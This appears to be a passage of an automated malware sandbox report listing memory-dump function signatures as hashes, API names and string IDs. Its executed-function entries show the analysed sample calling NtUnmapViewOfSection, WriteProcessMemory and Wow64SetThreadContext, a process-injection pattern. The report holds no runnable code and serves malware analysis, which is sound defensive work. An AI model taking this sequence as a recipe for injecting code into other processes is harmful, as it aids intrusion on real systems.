                                                                                                                                    Similarity
                                                                                                                                    • API ID: BytesCheck$HeapPointerValid__errno__free_base_memset
                                                                                                                                    • String ID: tDj
                                                                                                                                    • API String ID: 2211402958-2513116121
                                                                                                                                    • Opcode ID: 7f1a9ee6f74770888807261217c2b5e60a315f231e168795c0b9dc81bfec780d
                                                                                                                                    • Instruction ID: c30059b7c6e2902b61a0aac9ea4fbc757bf5df0b3050e10b41d1cc0740d3e125
                                                                                                                                    • Opcode Fuzzy Hash: 7f1a9ee6f74770888807261217c2b5e60a315f231e168795c0b9dc81bfec780d
                                                                                                                                    • Instruction Fuzzy Hash: F691A370B40204BBDB24DB54DD82FAA73A5EB48704F304159F604AB3D2D279EE81DB9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno$Message___crt__invoke_watson_if_error__snwprintf_s_raise_wcscpy_s
                                                                                                                                    • String ID: -G@
                                                                                                                                    • API String ID: 2907285194-103847155
                                                                                                                                    • Opcode ID: 11095026a0f4ddbeaf2e4af44874a4c7565b3e510116494cf642a0335749c930
                                                                                                                                    • Instruction ID: 31bbad08808502f9c117a0f46d362f5607bd28bd97c523a95b531ee8eb9d5839
                                                                                                                                    • Opcode Fuzzy Hash: 11095026a0f4ddbeaf2e4af44874a4c7565b3e510116494cf642a0335749c930
                                                                                                                                    • Instruction Fuzzy Hash: 683184B5F40214BBDB24EA91DC42FDA73B5AB4C704F0041AAF309762C6D6785AC18F99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno_memset$__invalid_parameter
                                                                                                                                    • String ID: P
                                                                                                                                    • API String ID: 2239222518-3110715001
                                                                                                                                    • Opcode ID: 40f9928747d2af79493494889962d63e740aabbb0e512ce6726ff1120d10e0fa
                                                                                                                                    • Instruction ID: dd27e8535942e38fdb3dabfe661de93b13ed25f46f5b2cb79041b53ff4ae2dd7
                                                                                                                                    • Opcode Fuzzy Hash: 40f9928747d2af79493494889962d63e740aabbb0e512ce6726ff1120d10e0fa
                                                                                                                                    • Instruction Fuzzy Hash: 20418B70E01219EBCF14CF68D8457AE7771FB44318F10866EE8255A3D0CB799A66CF89
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: '$0$9
                                                                                                                                    • API String ID: 3120068967-269856862
                                                                                                                                    • Opcode ID: bf48d2c01b623cf97400a2c4d0244ca3e7eb7da97ac3bcaf6a95d241c01778cd
                                                                                                                                    • Instruction ID: 0318e8824cf5846596fa02da276e0eddbc6af985e5cad254189ed087eed37cc3
                                                                                                                                    • Opcode Fuzzy Hash: bf48d2c01b623cf97400a2c4d0244ca3e7eb7da97ac3bcaf6a95d241c01778cd
                                                                                                                                    • Instruction Fuzzy Hash: 8141F271A05628DFDB24CF48D889BAEB7B5FF44308F5485DAD448AB241C3389A81CF85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 0$9
                                                                                                                                    • API String ID: 3120068967-1975997740
                                                                                                                                    • Opcode ID: 9fe8673b4a284eb21c839c761d7e88681c39cde252b3e4cc70ed3de5c1e82d58
                                                                                                                                    • Instruction ID: 16738c2f4a422dd06d35f6726b99fb3cff60d2a3279301d0e5e36f1977d06f39
                                                                                                                                    • Opcode Fuzzy Hash: 9fe8673b4a284eb21c839c761d7e88681c39cde252b3e4cc70ed3de5c1e82d58
                                                                                                                                    • Instruction Fuzzy Hash: 3F41F371E05628DFDB24CF48D889BAEB7B5FF44308F5485DAD449AB241C7389A81CF85
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: '$9
                                                                                                                                    • API String ID: 3120068967-1823400153
                                                                                                                                    • Opcode ID: e11ab51c2aaa91dc6f8c19ef18e750b7549c90fefb811f6d7ac18edb45747821
                                                                                                                                    • Instruction ID: 42e04d133b476b6c5a5d8866b508e4918b34cfa494087ed0080723c1b0ac767c
                                                                                                                                    • Opcode Fuzzy Hash: e11ab51c2aaa91dc6f8c19ef18e750b7549c90fefb811f6d7ac18edb45747821
                                                                                                                                    • Instruction Fuzzy Hash: 054107B1E001299FDB24CF48DD81BAEB7B5FF85314F50419AD148A7241D7789E81CF5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3120068967-2366072709
                                                                                                                                    • Opcode ID: fdb9d56939ac48b5148c6c4f2f08352fd1376580d8f2440f1ab04a6e4ff6ea25
                                                                                                                                    • Instruction ID: 15d0bff0f62f50fc9c28439a7dddf85826658908c1f18501516e461e9f2ee2c2
                                                                                                                                    • Opcode Fuzzy Hash: fdb9d56939ac48b5148c6c4f2f08352fd1376580d8f2440f1ab04a6e4ff6ea25
                                                                                                                                    • Instruction Fuzzy Hash: D24106B1E001299FDB24CF48DD81BAEB7B5FF85314F50819AE148AB241D7789E81CF5A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3120068967-2366072709
                                                                                                                                    • Opcode ID: 13f1a8206349fbcec969dfabc4bbbdf2762ca3a938afa60d90cef2e6a1d395bf
                                                                                                                                    • Instruction ID: 9fbc2bf35925de02b80fba557a5d46b3bdba5b4343a508a54cca52ee3735b3d5
                                                                                                                                    • Opcode Fuzzy Hash: 13f1a8206349fbcec969dfabc4bbbdf2762ca3a938afa60d90cef2e6a1d395bf
                                                                                                                                    • Instruction Fuzzy Hash: 8341F5B1E001299FDB24CF48DD81BAEB7B5FF85314F5081AAE149AB241D7389E81CF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 3120068967-2366072709
                                                                                                                                    • Opcode ID: a6b35121f21e9ebbb4f6ad9c6350a5e16c114db55709e161e90f67dae19db428
                                                                                                                                    • Instruction ID: 9058bd5233e54abace17e047a7dd133df57be09558f825b6dc601d9be07e1e3b
                                                                                                                                    • Opcode Fuzzy Hash: a6b35121f21e9ebbb4f6ad9c6350a5e16c114db55709e161e90f67dae19db428
                                                                                                                                    • Instruction Fuzzy Hash: 3D41E371E01628DFEB24CF48D899BAEB7B5FF44304F54859AE449AB241D7389E81CF84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 2124759748-2366072709
                                                                                                                                    • Opcode ID: 65d42acc206d4093b8fcfc839c5c970e345671cb0e1463a3308c74bbed5768fa
                                                                                                                                    • Instruction ID: e41ff6c82e62816f30eb0318fcbef62b4b6b15778e89fd38867deca8ebe726aa
                                                                                                                                    • Opcode Fuzzy Hash: 65d42acc206d4093b8fcfc839c5c970e345671cb0e1463a3308c74bbed5768fa
                                                                                                                                    • Instruction Fuzzy Hash: 8641E4B1E001299FDB24CF48DD81BAEB7B5FB85314F5081EAE149A7241D7789A81CF1A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _get_int64_arg$__aulldiv__aullrem
                                                                                                                                    • String ID: 9
                                                                                                                                    • API String ID: 2124759748-2366072709
                                                                                                                                    • Opcode ID: 8ba939bdaa6ce744a7502132470aaa8cc86510893d4d9d8f8ce2315b4b7611c2
                                                                                                                                    • Instruction ID: a3b53726d153f1bb5b0e9c0d1c15a4ecd95bf20a68dad5363ac1304bfad30759
                                                                                                                                    • Opcode Fuzzy Hash: 8ba939bdaa6ce744a7502132470aaa8cc86510893d4d9d8f8ce2315b4b7611c2
                                                                                                                                    • Instruction Fuzzy Hash: 7A41E471A05628DFDB24CF48E889BAEB7B5FF44304F6085DAE449AB241D7389E81CF45
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __initterm.LIBCMTD ref: 00419EEA
                                                                                                                                    • __initterm.LIBCMTD ref: 00419EFC
                                                                                                                                    • __CrtSetDbgFlag.LIBCMTD ref: 00419F0F
                                                                                                                                    • ___freeCrtMemory.LIBCMTD ref: 00419F26
                                                                                                                                      • Part of subcall function 00418F80: RtlEncodePointer.NTDLL(00000000,?,00420FFE), ref: 00418F87
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __initterm$EncodeFlagMemoryPointer___free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2654307729-0
                                                                                                                                    • Opcode ID: 9ffeb9a6a16c8145eefb2377892b528700be8179186667c83366b5b4f5f7deac
                                                                                                                                    • Instruction ID: 58f54717aa19c88f19e8dabc8049376e9058faeea90454d47aeeb719af1ecf13
                                                                                                                                    • Opcode Fuzzy Hash: 9ffeb9a6a16c8145eefb2377892b528700be8179186667c83366b5b4f5f7deac
                                                                                                                                    • Instruction Fuzzy Hash: 84411675E05209DBCB04DFA4D994AEEBBB1FB48314F24466AE411B3390D7396881CF69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset
                                                                                                                                    • String ID: R"L$t!h<!@
                                                                                                                                    • API String ID: 2102423945-1202547949
                                                                                                                                    • Opcode ID: e79208c7b8eb3658cad8c565fc1a637447da32a738feacc3f588254750d92c15
                                                                                                                                    • Instruction ID: ea58af0800961419a8fb65ecb3375f5d08f57ed4dc3e3f13d8063ca7b2a1770b
                                                                                                                                    • Opcode Fuzzy Hash: e79208c7b8eb3658cad8c565fc1a637447da32a738feacc3f588254750d92c15
                                                                                                                                    • Instruction Fuzzy Hash: 38215175A00104EFCB14CF54DA81AAA77B2FB89308F30C19AE4055B395D739EE42DF99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.480910207.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __errno__invalid_parameter
                                                                                                                                    • String ID: u.
                                                                                                                                    • API String ID: 3025725278-3285101172
                                                                                                                                    • Opcode ID: 792911f5d30bace1ddb4cffdbd48c733af9fb67f862e9f575490635da76451c6
                                                                                                                                    • Instruction ID: 1a37532de20245b4f670c5593df2ff5077b23805f1e3e1b16de38e10507daad3
                                                                                                                                    • Opcode Fuzzy Hash: 792911f5d30bace1ddb4cffdbd48c733af9fb67f862e9f575490635da76451c6
                                                                                                                                    • Instruction Fuzzy Hash: 70F0E5F1BD03086AF6206A449D47F997210E749B14F30047BF109756C295FE244201AE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535815638.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: {&
                                                                                                                                    • API String ID: 0-4210536796
                                                                                                                                    • Opcode ID: dc6f35788e5d9e9006274d65012187fb809712fcd8111d6dfd13922a687f338a
                                                                                                                                    • Instruction ID: f05a2333176b0d7ce3cad2d3af754b95c89bd66d059ae5e5546bdc1a644c310b
                                                                                                                                    • Opcode Fuzzy Hash: dc6f35788e5d9e9006274d65012187fb809712fcd8111d6dfd13922a687f338a
                                                                                                                                    • Instruction Fuzzy Hash: E8B24574B00215CFCB24DF69C899A69B7F6BF88314F1185A9E90ADB365DB70EC81CB11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0541FA23
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.536167146.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                    • Opcode ID: 50d22ea0fa590559cc33cf0cd956a3fe98a6380e97c10c9921618e07efeeabab
                                                                                                                                    • Instruction ID: 017822f866a7ed5e5d243f0a74f1d1feba6263b5b42747c46c9f15550c828eaf
                                                                                                                                    • Opcode Fuzzy Hash: 50d22ea0fa590559cc33cf0cd956a3fe98a6380e97c10c9921618e07efeeabab
                                                                                                                                    • Instruction Fuzzy Hash: 5D21E4B1D002099FCB10DFA9D884ADEFBF5BF48254F50842AE919A7250CB759955CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 0541F925
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.536167146.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: SectionUnmapView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 498011366-0
                                                                                                                                    • Opcode ID: 59cec6a65631be32a43f7873340e198c563f6c00dfbafe775d66b0172ff92a40
                                                                                                                                    • Instruction ID: 2cb0a7561dce925b6a4f74d8ed8322a182943492543f06649b46e098fe13ec21
                                                                                                                                    • Opcode Fuzzy Hash: 59cec6a65631be32a43f7873340e198c563f6c00dfbafe775d66b0172ff92a40
                                                                                                                                    • Instruction Fuzzy Hash: C2112B71D003089FDB10DFA9D8447DFFBF5AB48224F24842AD415A7340CB75A945CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535614080.00000000052F0000.00000040.00000001.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c939bf3cbdc6a1b1d48ed1e9a1875f09de951bc8855a398073c59d54906bcd2f
                                                                                                                                    • Instruction ID: 788bb3548485ed6ff789084c486d08dfd75b5532b8549c2e9219aa5a530c3dc4
                                                                                                                                    • Opcode Fuzzy Hash: c939bf3cbdc6a1b1d48ed1e9a1875f09de951bc8855a398073c59d54906bcd2f
                                                                                                                                    • Instruction Fuzzy Hash: A952AF30B14215DFCB599F64E844A6EBBB6FF88300F158479E90A9B3A1DB71DC42CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.528218881.0000000002BF0000.00000040.00000001.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aa1efb5a8dbf7919560ab8e19cea022af3658bcf11654704c47d761be22f3494
                                                                                                                                    • Instruction ID: 0cf0ab3f251d3a34fd0d3061b9a5a3c6a8070483eeb392d0e1874c41d7d3541f
                                                                                                                                    • Opcode Fuzzy Hash: aa1efb5a8dbf7919560ab8e19cea022af3658bcf11654704c47d761be22f3494
                                                                                                                                    • Instruction Fuzzy Hash: 53523735A005149FCB59DFA8C984B68BBB2FF48314F1681A8E619AB376CB31EC45DF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535815638.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a9ea5b08d885d118fd72426fd81caca5514612a7815af51c16c40c1dae606366
                                                                                                                                    • Instruction ID: 703ab0ef27023e00030d2257890b1db527f64c9c31b0a86750959dfa87661c1e
                                                                                                                                    • Opcode Fuzzy Hash: a9ea5b08d885d118fd72426fd81caca5514612a7815af51c16c40c1dae606366
                                                                                                                                    • Instruction Fuzzy Hash: 26F14F34E002099FCB18DFA4D499AADBBB6FF84304F148969E406AB399DF75DC46CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535815638.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d476ee754b3f73380649dbf88248293855607c5ded66429823e511960dd3d2c4
                                                                                                                                    • Instruction ID: 225e84b1e049cb7a24934714e538523d4376091d588704a2c174654b25060372
                                                                                                                                    • Opcode Fuzzy Hash: d476ee754b3f73380649dbf88248293855607c5ded66429823e511960dd3d2c4
                                                                                                                                    • Instruction Fuzzy Hash: DD9105F6A102009FDB55CF64D887AAABBB6FF84300F54846AE409DB356DB70EE45CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535815638.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e432e698a46c61aafe7a67c0112b817b7ce456af860c782c05435530b6eb208c
                                                                                                                                    • Instruction ID: 7c6b84e2c38e5ce55e07e9d073caa7d2d876b612ef335aeaed6a9e45c96e000e
                                                                                                                                    • Opcode Fuzzy Hash: e432e698a46c61aafe7a67c0112b817b7ce456af860c782c05435530b6eb208c
                                                                                                                                    • Instruction Fuzzy Hash: 7B61E87A9381008FD396DB23E9D3B433BBEE750351F5408D2A118DF692DA25AA11BE58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535815638.0000000005330000.00000040.00000001.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 29323863bf6259e3fb788f12ae5ee904099ce28137d4a9a1145e731eb5be95fa
                                                                                                                                    • Instruction ID: 46887057f35246ed96406490ac5dca7883dae8070b9302c889afd26307b545c0
                                                                                                                                    • Opcode Fuzzy Hash: 29323863bf6259e3fb788f12ae5ee904099ce28137d4a9a1145e731eb5be95fa
                                                                                                                                    • Instruction Fuzzy Hash: 52635F74A40318ABEB249B90CC65BDE77B6EB88700F10809AE70D7B2D5DB751E84DF16
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535614080.00000000052F0000.00000040.00000001.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d
                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                    • Opcode ID: a9925ecd3dd647d315d5a7c9f3f85996c7fa3b49a28eb91a1bed9f90a74ab4fe
                                                                                                                                    • Instruction ID: 8c5e17b25cae7b71a31484ea358f634012de15f761ed95c107e173bf1e916c83
                                                                                                                                    • Opcode Fuzzy Hash: a9925ecd3dd647d315d5a7c9f3f85996c7fa3b49a28eb91a1bed9f90a74ab4fe
                                                                                                                                    • Instruction Fuzzy Hash: 0E027734B106028FD724CF59D48496AF7F6FF88324B25CA69D56A9B761DB30F842CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535614080.00000000052F0000.00000040.00000001.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ;\
                                                                                                                                    • API String ID: 0-3126748795
                                                                                                                                    • Opcode ID: 5b587da6bcd400578c5995a6fd75416d30e88d81c02594811fd97adb523a3b94
                                                                                                                                    • Instruction ID: 171a3319314a544124c437fc1899fdf25fc90039871ca4bb4902196d8dc869d7
                                                                                                                                    • Opcode Fuzzy Hash: 5b587da6bcd400578c5995a6fd75416d30e88d81c02594811fd97adb523a3b94
                                                                                                                                    • Instruction Fuzzy Hash: 97E1C535B146068BCB14DBA9E890AAEB3F7FF84704B108839E51ADB358EF71DD018B55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0541DBA6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.536167146.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                    • Opcode ID: 457081f61266080ab60593b3760b933023e0d23fef656b61756e3237228ebaee
                                                                                                                                    • Instruction ID: e5980f440420e87d7c0ea9be6f9f235581fd9bb04688408dad48acc63313e4de
                                                                                                                                    • Opcode Fuzzy Hash: 457081f61266080ab60593b3760b933023e0d23fef656b61756e3237228ebaee
                                                                                                                                    • Instruction Fuzzy Hash: BD5114B1D00229DFDB24CF95C940BDEBBB5BF48304F1484AAE909B7250DB759A85CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 02BF847F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.528218881.0000000002BF0000.00000040.00000001.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                    • Opcode ID: 85c7d41576e87962cd7bb281c8f2a7382a383bfb64323e8f337d7512a3aea775
                                                                                                                                    • Instruction ID: be81fb9a495380c6c96e703222359b3b7bd3be738b891634845a5223e333f30b
                                                                                                                                    • Opcode Fuzzy Hash: 85c7d41576e87962cd7bb281c8f2a7382a383bfb64323e8f337d7512a3aea775
                                                                                                                                    • Instruction Fuzzy Hash: 464159B0D006189FDB50CFA9D88579EBBF1FB48314F18816AD915E7384DB749845CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.535614080.00000000052F0000.00000040.00000001.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d
                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                    • Opcode ID: 1074b97e85a880722acd0fe56fff0424117d555d67cf4d7e568ca9f5a57944df
                                                                                                                                    • Instruction ID: 509952b9ce38c9bc85abda6fd7d121d231506f2c64599f32a00e25b4ce9197a3
                                                                                                                                    • Opcode Fuzzy Hash: 1074b97e85a880722acd0fe56fff0424117d555d67cf4d7e568ca9f5a57944df
                                                                                                                                    • Instruction Fuzzy Hash: A5D1993160460A9FC720CF18D584D6AFBFAFF84310B56CA69D55A9B6A1DB30FC55CB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02BF86EC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.528218881.0000000002BF0000.00000040.00000001.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                    • Opcode ID: bc1c2eb9f56667fee07741e1d724aace62b7e1bd9596c98dbd24beeb6836b0d8
                                                                                                                                    • Instruction ID: 4001fbbfbd0554d3b235337212992248e4f8db250a240fcbb6181cec33c76446
                                                                                                                                    • Opcode Fuzzy Hash: bc1c2eb9f56667fee07741e1d724aace62b7e1bd9596c98dbd24beeb6836b0d8
                                                                                                                                    • Instruction Fuzzy Hash: 5911E3B1D002089BDB10DFAAC884BEEFBF4EB48224F14842AD519A7240CB75A945CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0541FB0E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.536167146.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: 491ef8405285014fe6b490b2d5c3ef4a84e50776f358a19d468b9a00cb3c10f3
                                                                                                                                    • Instruction ID: 139708e0b34846776f6bd437f7817cac6799144b078d80847cedc23b5c0a2265
                                                                                                                                    • Opcode Fuzzy Hash: 491ef8405285014fe6b490b2d5c3ef4a84e50776f358a19d468b9a00cb3c10f3
                                                                                                                                    • Instruction Fuzzy Hash: AE115C719003099FCB10CFA5C844BEFBBF5EF48324F14842AD515A7240CB799955DFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0541FCB5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.536167146.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 563e176cfb0ba7604258bbadc230eae14b812728074456514ccff0d82040f107
